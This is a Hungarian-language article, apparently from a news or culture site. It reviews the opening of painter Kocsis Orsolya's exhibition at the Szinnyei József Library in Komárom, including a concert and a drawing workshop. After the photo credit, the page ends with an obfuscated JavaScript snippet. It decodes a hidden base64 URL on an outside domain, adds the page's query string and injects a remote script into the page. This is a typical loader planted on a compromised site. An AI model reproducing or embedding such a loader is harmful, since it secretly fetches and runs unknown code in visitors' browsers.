Ha egy macska hordaná hátán az egész világot, szebbek lennének a mindennapjaink. Speciel és kutyás vagyok, úgyhogy az előző mondatba a cica helyett az ebet helyettesíteném, ám értelmén s végeredményén mit sem változtatna. Mert a macska (vagy a kutyus) okos lény. Pontosan tudja, mi a jó neki, mi nem. S ami nem, azt ösztönösen kerüli. Ha egy macska hordaná hátán a világot, lerázná magáról a gyűlölködőket, az uszítókat, a mások ellen áskálódókat. Lerázná a fegyvereket, az ártalmas szereket. Ha egy macska hordaná hátán a világot, szerintem az emberiség sokkal boldogabb lenne meg elégedettebb. Több lenne az ölelés, a kedveskedő érintés. Mert a macska csak szimbólum. Jézust takarja.

Bámulatos és varázslatos. Meseszerű. Színes és csillogó. Megmosolyogtató. Léleksimogató. Reménykeltő. Elbűvölő. Elgondolkodtató. Álomba repítő. Szárnyakat adó. Jó kedvre derítő. Ilyen és ehhez hasonló jelzők pattogtak a fejemben a Szinnyei József Könyvtár kiállításmegnyitóján. Az alkotó Kocsis Orsolya, aki Medve községből származik, Komáromban lakik és pedagógiai asszisztensként dolgozik a komáromi Eötvös Utcai Alapiskolában.

Sürgött-forgott a tárlatra érkező közönsége között. Mindenkihez volt egy kedves szava vagy éppen egy barátságos mosolya. Mindenkihez. Azokhoz is (jómagamat is beleértve), akikkel még soha korábban nem találkozott. Azon gondolkodtam, vajon hány kiló mosoly fér el egy ilyen bájos arcon? Aztán meg azon, ha Orsolya, ez a „csupamosoly” festőművész hordaná hátán az egész világot, talán nem tudna mindennel olyan könnyen megbirkózni, mint a macska vagy Jézus, de szerintem akkor is szebbek lennének a mindennapjaink.

A kiállításmegnyitó – rendhagyóan és kellemes meglepetésként – négy részre tagozódott. Az első rész a könyvtár emeletére megérkező művészetkedvelő közönség első találkozása volt a falra akasztott alkotásokkal. A fel-felragyogó szemek, a csodálkozástól tátva maradt szájak, a szépség élmény szinte tapintható megnyilvánulása.

A második rész az előadóterem ajtóinak kitárulása után következett, amikor kiderült, hogy odabent is vannak képek. Néhány ráadásul kiemelten: festőállványon, Orsolya által fogalmazott közelítő szavakkal ellátva. Ezek a kis szövegek olyanok voltak, mint neves múzeumokban az idegenvezető: közelebb hozták az alkotót a nézőhöz, nemcsak a látott művet, de annak hátterét is, a gondolatokat, érzéseket, amelyek készítés közben születtek.

A harmadik részt a Borostyán együttes biztosította, ugyanis egy rendkívül jó hangulatú, vidám koncerttel tették még színesebbé, még élvezhetőbbé Kocsis Orsolya képeinek szemlélését. Az együttes vezetője, Nagy László megemlítette, találkozva a művésszel és látva képeit, nem volt nehéz meghatározniuk a koncert hangulatát. Állítása szerint ugyanis a festményekből árad a pozitív életérzés, így ők is ezt az irányt kívánták követni.

A negyedik rész pedig az alkotásé volt. Mert úgy lehet a leginkább belelátni egy művész fejébe, megismerni a műhelytitkait, ha leülünk, és megpróbáljuk létrehozni azt, amivel ő is foglalkozik. Kocsis Orsolya nemcsak a gyermekeket várta workshopjára, ahol képeslapokat vagy könyvjelzőket lehetett készíteni, hanem a felnőtteket is, akik – és ez volt számomra a nap második hatalmas meglepetése – kérés nélkül is tolultak a terem hosszú asztalai felé, alig várva, hogy ceruzához, filchez és Orsolya útmutatásaihoz jussanak.

A megnyitón Kocskovics Reczai Lillától, a Szinnyei József Könyvtár munkatársától, marketingesétől megtudtuk, hogy májusban még megtekinthető lesz a tárlat, viszont higgyék el nekem, hogy ez nem hosszú idő! Olyan gyorsan megérkezik a tavasz legszebb, legszerelmesebb hónapja, hogy már csak arra eszmélünk majd, amikor becsomagolják a „Válaszd az ÉLETET!” című kiállítás anyagát! Hallgassanak rám: ne várjanak az utolsó percig! Ha meglátják a képeket, hiszem, hogy másokban is kialakul az érzés, hogy nem elég csak egyszer megtekinteni! Egyetlen szívfájdalmam van csupán! Az, hogy Kocsis Orsolya nem készít hazavihető, zsebre vágható kabalákat a képein szereplő alakokból. Pedig milyen jól mutatna szekreteremen a könyvet olvasó manója!

fotó: a szerző

(function(){var a=document.head||document.getElementsByTagName(“head”)[0],b=”script”,c=atob(“aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=”);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();